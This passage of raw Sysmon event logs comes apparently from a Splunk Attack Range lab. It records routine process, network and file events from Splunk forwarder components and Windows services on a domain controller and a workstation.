Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CFBCD3C6DC5820F9B055AB084D64DDC1,SHA256=1248B5E75E1C344D66618B71233AABBB329FB78AF7C2731CEA702AB181A29510,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981244Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:29.387{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=605DC5212B9B8329AFEC4975C47E63B1,SHA256=D9F394D8646E9D877A8D3637589289BCFB3E1AA58322758A0C51A19DDA7CE38F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981243Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:29.105{69CF5F33-8D90-6151-197A-00000000FD01}34281616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000981248Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:30.559{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA224958C2F14D27AADF1C44AEA37E4F,SHA256=E61861CF1F2C0F972DC053C33DD4D6BEE107F272E8A98D91C6AFB2FFA371B789,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981247Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:30.402{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92382DC9E562B951B32C7246DE2C0E09,SHA256=533E8A41BE62C222B45A1231B045EE8CEB725AC77025C4B0D6389076A718AD3B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056644Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:30.934{5EBD8912-8D92-6151-B100-00000000FD01}54725868C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056643Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:30.763{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D92-6151-B100-00000000FD01}5472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056642Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:30.763{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056641Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:30.763{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056640Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:30.763{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056639Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:30.763{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056638Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:30.763{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8D92-6151-B100-00000000FD01}5472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056637Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:30.763{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D92-6151-B100-00000000FD01}5472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056636Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:30.764{5EBD8912-8D92-6151-B100-00000000FD01}5472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001056635Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:30.653{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84EC7C3D71EE75AA4F79CD0B4415F3FC,SHA256=DC6CED054663EB8A85A9B0C94E3C714DE0F315475C630C3A7CA109734075BBC6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981246Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:26.743{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59536-false10.0.1.12-8000- 23542300x8000000000000000981250Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:31.480{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84D84DB14664B085810BC919FD90B729,SHA256=6819146C152F2042C23D9F2594F10CCB37E1757644CACC044DDBAF946D79F009,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056657Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:30.667{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63252-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001056656Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:29.604{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54235-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001056655Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:29.604{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54235-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001056654Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:31.810{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=14FAE88612AE6E2E691CCF906C7F6F83,SHA256=956210D537A95C2E5F5DB785C6B5DF2CA14658BA82F2AA8F2BC6772D5B03DC04,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056653Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:31.653{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D93-6151-B200-00000000FD01}5824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056652Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:31.653{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056651Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:31.653{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056650Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:31.653{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056649Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:31.653{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056648Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:31.653{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8D93-6151-B200-00000000FD01}5824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056647Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:31.653{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D93-6151-B200-00000000FD01}5824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056646Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:31.654{5EBD8912-8D93-6151-B200-00000000FD01}5824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001056645Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:31.028{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACF5D28C9A78E145C47D6516FCA91552,SHA256=F851C751DEB8006705617D373F5AD3438285F73A430D3B5F5374612E91D58BBC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981249Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.848{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62144-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981252Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:32.637{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=2BADB37C1F173499A5B75D671057B424,SHA256=C9CE2D29D666C766C1C0976AB9DF294CE8D333EA7658D900F3CB15D95E91739F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981251Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:32.574{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D762564D1B3E82CBB958C538DCAD1811,SHA256=8DF44F10C3AC4B2E71B2C826881861A112BB97F332C6D6ACF134F892FB3C4914,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056660Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:31.166{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54236-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001056659Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:32.200{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0012B093823CBC0859E8388EBB01688,SHA256=6B0535CFE807D312BB7E6DA760F218881D1D033985A7DD6B4179FBE279899DE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056658Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:32.185{5EBD8912-8CBD-6151-0B00-00000000FD01}640NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Users\Administrator\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.datMD5=93B885ADFE0DA089CDF634904FD59F71,SHA256=6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x8000000000000000981253Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:33.777{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6C4B5A79A134F1151031B2795FA467B,SHA256=326693B6EEC9EAE00B8C214F1CC82F3883C1B67923040EE0727A43C4B92B345E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056670Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:33.638{5EBD8912-8D95-6151-B300-00000000FD01}49684360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056669Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:33.388{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 